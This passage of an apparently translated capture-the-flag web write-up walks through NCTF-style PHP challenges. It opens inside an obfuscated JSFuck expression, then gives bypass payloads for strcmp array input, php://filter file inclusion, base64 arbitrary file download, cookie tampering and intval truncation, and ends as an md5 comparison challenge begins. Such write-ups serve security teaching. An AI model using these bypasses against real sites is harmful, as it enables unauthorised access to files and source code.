!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+[]))+(+!![]+[])+({}+[])[!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(![]+[])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(![]+[])[+!![]]+(![]+[])[+!![]]+(![]+[])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+[])+(![
]+[])[+[]]+({}[[]]+[])[!![]+!![]]+(!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])
[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+[])[!![]+!![]+!![]])+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]
]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[+[]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([]
[(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+[]))+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!
![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])))()
- Run it in the browser console and the page shows a PHP file name. (Safer than running code you haven't read: drop the final "()" and the expression returns the constructed function instead of calling it, so printing it shows the decoded source.) The file name is an md5 hash; md5 cannot be reversed, so "decrypting" it means matching it against candidate words, which gives md5.php.
1bc29b36f623ba82aaf6724fd3b16718.php
-
Open that page
- tip: history of bash
The ".bash_history" file stores the commands a user has run in the shell.
- Open .bash_history
http://teamxlc.sinaapp.com/web3/b0b0ad119f425408fc3d45253137d33d/.bash_history
zip -r flagbak.zip ./*
- Open flagbak.zip
It downloads directly; inside is a flag.txt file
- flag is:nctf{bash_history_means_what}
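The two recon steps above, matching the md5 file name and reading artefact names out of .bash_history, are worth having as reusable code. The following Python is an added example (not from the original writeup): md5_lookup hashes each candidate and compares, which is all an online "md5 decrypt" site does with a bigger word list, and artifacts_from_history picks out files that commands such as zip, tar, cp, mv and shell redirections leave behind in the web root. The history text is constructed; only the zip line comes from the challenge.

```python
import hashlib
import re
import shlex


def md5_lookup(hexdigest, candidates):
    """Return the candidate word whose md5 equals hexdigest, or None.

    md5 is not reversible: "decrypting" a hash means hashing guesses and comparing.
    """
    target = hexdigest.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


REDIRECT_TARGET = re.compile(r">>?\s*(\S+)")  # "cmd > out" or "cmd >> out"


def artifacts_from_history(history):
    """List files that commands in a .bash_history dump created, copied or moved.

    zip/tar: the first non-option argument is the archive written.
    cp/mv:   the last argument is the destination.
    >, >>:   the redirection target is written to disk.
    """
    found = []
    for line in history.splitlines():
        try:
            argv = shlex.split(line)
        except ValueError:        # unbalanced quotes, skip the line
            continue
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if cmd in ("zip", "tar"):
            names = [a for a in args if not a.startswith("-")]
            if names:
                found.append(names[0])
        elif cmd in ("cp", "mv") and len(args) >= 2:
            found.append(args[-1])
        m = REDIRECT_TARGET.search(line)
        if m:
            found.append(m.group(1))
    return found


# Constructed sample history; only the zip line is from the challenge.
SAMPLE_HISTORY = """\
ls -la
vim index.php
zip -r flagbak.zip ./*
cp config.php config.php.bak
mysqldump -u root -p ctf > dump.sql
rm -rf /tmp/build
"""

if __name__ == "__main__":
    print(md5_lookup("1bc29b36f623ba82aaf6724fd3b16718", ["index", "flag", "admin", "md5"]))
    print(artifacts_from_history(SAMPLE_HISTORY))
```

Each name returned is a candidate URL to request next to the history file, which is how flagbak.zip turned up here.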
pass check
Core source
<?php
$pass=@$_POST['pass'];
$pass1=***********;//the hidden password
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>
Portal: challenge link
- The page has only one line
please input pass!
-
Analysis:
1. The source means the POSTed pass has to equal pass1.
2. In PHP, @ suppresses the errors and warnings a function raises while it runs, so the user never sees the error output.
3. strcmp() does the comparison.
4. Two equal strings give 0, which is why there is a ! in front of strcmp().
5. Exploit PHP's loose typing.
- POST an array so that strcmp() returns NULL instead of an integer; "!NULL" is true, so echo "flag:nctf{*}" runs. In PHP 5 and 7, strcmp() with an array argument emits a warning (silenced here by @) and returns NULL; PHP 8 throws a TypeError instead, so this trick depends on the PHP version. The fix is to reject non-string input with is_string() and compare with hash_equals().
1. At first I built it as pass=[], which did nothing.
2. It has to be built as pass[]=123 (PHP parses a parameter name ending in [] into an array).
- flag:nctf{strcmp_is_n0t_3afe}
Header
Headers!!! Headers!!! Headers!!!
Portal: click me
-
Look straight at the response headers
- nctf{tips_often_hide_here}
File inclusion
Yes, this is the legendary LFI
Portal: click me to fly
TIPS:http://drops.wooyun.org/tips/3827
- Not going into it; this challenge is the same as Bugku's "flag is in index" (the usual approach there is the php://filter/read=convert.base64-encode/resource=index.php wrapper, which returns the PHP source base64-encoded instead of executing it). See [Bugku writeup]Web
- nctf{edulcni_elif_lacol_si_siht}
Single for a hundred years is no use either
Yes... for this one, even a hundred years of being single won't help
Portal: biu~
-
Same old routine: watch the Network tab, click through and see what changes
- The index.php request that was a 304 before is now a 302; the flag is in the response headers, which the browser skips over as it follows the redirect
- nctf{this_is_302_redirect}
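Three of the challenges above ("Single for twenty years", "Header" and this one) hide the answer in places a browser shows you only reluctantly: a non-standard response header, the headers of a 302 it immediately follows, or a body it leaves before you can read it because of a JavaScript redirect. As an added example (not from the original writeup), here is a Python function that takes a raw HTTP response, as captured by a proxy or by curl -i without -L, and reports each of those hiding places. The two responses are constructed; the header name Flag and the placeholder values are assumptions, not the challenge's real data.

```python
import re

# Headers a typical web server sends anyway; anything else deserves a look.
COMMON_HEADERS = {
    "date", "server", "content-type", "content-length", "connection",
    "cache-control", "expires", "pragma", "vary", "set-cookie", "location",
    "last-modified", "etag", "transfer-encoding", "content-encoding", "x-powered-by",
}
# window.location = "...", location.href = "..." and the like
JS_REDIRECT = re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""")


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status, headers, body); header names are lowercased."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers found")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def find_hints(raw):
    """Return (status, hints) where hints maps each hiding place to what was found there."""
    status, headers, body = parse_response(raw)
    hints = {}
    if 300 <= status < 400 and "location" in headers:
        # A browser follows this at once; the headers of this response never get shown.
        hints["http_redirect"] = headers["location"]
    for name, value in headers.items():
        if name not in COMMON_HEADERS:
            hints["header:" + name] = value
    text = body.decode("utf-8", "replace")
    m = JS_REDIRECT.search(text)
    if m:
        # The page navigates away on load, but the body was already delivered in full.
        hints["js_redirect"] = m.group(1)
        hints["body"] = text.strip()
    return status, hints


# Constructed responses standing in for the captured ones.
RAW_302 = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: nginx\r\n"
    b"Location: ./no_key_is_here_forever.php\r\n"
    b"Flag: nctf{example_flag_in_header}\r\n"   # assumed header name and placeholder value
    b"Content-Length: 0\r\n\r\n"
)
RAW_JS = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n\r\n"
    b'<script>window.location="./no_key_is_here_forever.php"; </script>\n'
    b"key is : nctf{example_key_in_body}\n"       # placeholder value
)

if __name__ == "__main__":
    print(find_hints(RAW_302))
    print(find_hints(RAW_JS))
```

The practical rule it encodes: never let the client follow redirects or execute scripts while you are looking for hints; read the first response exactly as the server sent it.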
Download~!
Download whatever you like, just not the music. No kidding, try downloading something else
True · Ultimate · Portal: click me
- View the source
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Game 19</title>
<link href="templatemo_style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="templatemo_container">
<div id="templatemo_header"> <div id="website_title"> </div> </div>
<div id="templatemo_menu">
<ul> <li><a href="#" class="current">Tips</a></li> <li><b>down</b></li> </ul>
</div>
<div id="templatemo_content_wrapper">
<div id="templatemo_content">
<div class="content_title_01">Listen to a few songs</div>
<div class="horizontal_divider_01"> </div>
<div class="cleaner"> </div>
<p>To make the contest more relaxing, two songs have been prepared for you to download</p>
<p><a href="download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=" target="_blank">星星點(diǎn)燈</a></p>
<p><a href="download.php?url=YnV4aWFuZ3poYW5nZGEubXAz" target="_blank">不想長大</a></p>
<div class="cleaner"> </div>
</div>
<div class="cleaner"> </div>
</div>
<div id="templatemo_footer"> </div>
</div>
</body>
</html>
- Clicking "download.php?url=YnV4aWFuZ3poYW5nZGEubXAz" shows that the file name is base64-encoded. Try downloading other files; usually you want the source of the current page, so base64-encode download.php and construct:
view-source:http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw, which shows the source without downloading it.
<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
$file_size = filesize($url);
header ( "Pragma: public" );
header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
header ( "Cache-Control: private", false );
header ( "Content-Transfer-Encoding: binary" );
header ( "Content-Type:audio/mpeg MP3");
header ( "Content-Length: " . $file_size);
header ( "Content-Disposition: attachment; filename=".$url);
echo(file_get_contents($url));
exit;
}
else {
echo "Access Forbidden!";
}
?>
- Next, view the source of "hereiskey.php": view-source:http://way.nuptzj.cn/web6/download.php?url=aGVyZWlza2V5LnBocA==
<?php
//flag:nctf{download_any_file_666}
?>
- nctf{download_any_file_666}
COOKIE
COOKIE means biscuit~
Address: link
TIP:
0==not
- Use Tamper Data to change the cookie to login=1.
It shows:
flag:nctf{cookie_is_different_from_session}
nctf{cookie_is_different_from_session}
MYSQL
Not every challenge can be this easy
Right?
Challenge address
- Check robots.txt: http://chinalover.sinaapp.com/web11/robots.txt
Don't be so happy, the flag isn't here. Have you figured out what this file is for?
In CTF competitions this file often holds hint information.
TIP:sql.php
<?php
if($_GET[id]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$id = intval($_GET[id]);
$query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
if ($_GET[id]==1024) {
echo "<p>no! try again</p>";
}
else{
echo($query[content]);
}
}
?>
- Pass an id parameter to sql.php. At first I did not grasp the meaning of id=1024 and even tried brute-forcing the id; thinking it over, the content for id=1024 is actually the flag.
1. $id must be 1024
2. but the passed $_GET[id] must not equal 1024
3. use the integer-truncating intval() to construct it
- Set $_GET[id]=1024.1:
http://chinalover.sinaapp.com/web11/sql.php?id=1024.1
the flag is:nctf{query_in_mysql}
- nctf{query_in_mysql}
md5 collision
Source:
<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
echo "nctf{*****************}";
} else {
echo "false!!!";
}}
else{echo "please input a";}
?>
Link: challenge address
- Opening it shows one line:
please input a
- A parameter must be passed such that:
1. a != QNKCDZO
2. md5(a) == md5('QNKCDZO')
